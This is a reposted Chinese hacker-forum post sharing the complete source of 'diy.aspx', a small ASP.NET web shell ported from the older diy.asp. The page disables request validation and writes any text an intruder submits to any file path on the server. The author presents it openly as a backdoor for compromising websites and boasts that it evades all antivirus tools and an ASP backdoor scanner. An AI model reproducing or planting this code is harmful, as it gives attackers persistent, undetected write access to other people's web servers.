当前位置: 移动技术网 > IT编程>开发语言>.net > diy.aspx记念diy.asp

diy.aspx记念diy.asp

2018年09月16日  | 移动技术网IT编程  | 我要评论

万众海浪聊天室,黄金论坛,大白鲨大报复电影

[文章作者]寂寞hacker
[信息来源]邪恶八进制

要做毕业设计了,学校难得一次的批准了我们能够上网....不过2mb的速度,,,实在是...昨晚搞站的时候diy.被干掉了!网站支持aspx,,今天早上顺手写了个扔上来!本机测试正常,如有bug请告知!不甚感激!
想当初偶也是用着diy.asp很久,有点感情了!弄个他的版本,怀念一下!

以下为
<%@ page language="c#" validaterequest=false %>
<!doctype html public "-//w3c//dtd html 4.0 transitional//en" >
<html>
<head>
<title>diy 微型后门 作者:寂寞hacker qq:349063324</title>
<meta content="microsoft visual studio .net 7.1" name="generator">
<meta content="c#" name="code_language">
<meta content="javascript" name="vs_defaultclientscript">
<meta content="" name="vs_targetschema">
<script language="c#" runat="server">

void page_load(object sender, system.eventargs e)
{
string strpath = server.mappath(".");
l3.text = strpath;
}

void button1_click(object sender, system.eventargs e)
{
try
{
system.io.fileinfo fil = new system.io.fileinfo(t1.text);
system.io.streamwriter sw = fil.createtext();
sw.write(t2.text);
sw.flush();
sw.close();
l4.text = "文件保存成功!";
}

catch(exception ex)
{
l4.text = ex.message;
}
}
</script>
</head>
<body ms_positioning="gridlayout">
<form id="form1" method="post" runat="server">
<asp:label id="l1" style="z-index: 101; left: 24px; position: absolute; top: 96px" runat="server">本文件绝对路径:</asp:label>
<asp:textbox id="t1" style="z-index: 102; left: 144px; position: absolute; top: 64px" runat="server"
width="376px"></asp:textbox>
<asp:label id="l2" style="z-index: 103; left: 24px; position: absolute; top: 64px" runat="server">文件保存路径:</asp:label>
<asp:label id="l3" style="z-index: 104; left: 144px; position: absolute; top: 96px" runat="server"
width="584px"></asp:label>
<asp:textbox id="t2" style="z-index: 105; left: 24px; position: absolute; top: 128px" runat="server"
width="504px" height="344px" textmode="multiline"></asp:textbox>
<asp:button id="button1" style="z-index: 106; left: 424px; position: absolute; top: 504px" runat="server"
width="96px" text="保存文件" onclick="button1_click"></asp:button>
<asp:label id="l4" style="z-index: 107; left: 144px; position: absolute; top: 24px" runat="server"
width="432px"></asp:label></form>
</body>
</html>

偶为连保存文件都懒得弄的兄弟(比如我)保存好放在附件里了,,很简单的东西!只是方便大家搞站的时候..多个后门罢了!测试的时候.通过所有杀毒软件!包括lake2大哥的asp后门扫描工具!总之。..到目前为止..是没有杀毒弄他的!使用和diy.asp一样!

ps:偶美工不敢恭维!就不献丑了!哪位兄弟改得漂亮一点的话!麻烦给我一份,谢谢!msn:estjmx@hotmail.com

如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!! 点击进行留言回复

相关文章:

验证码:
移动技术网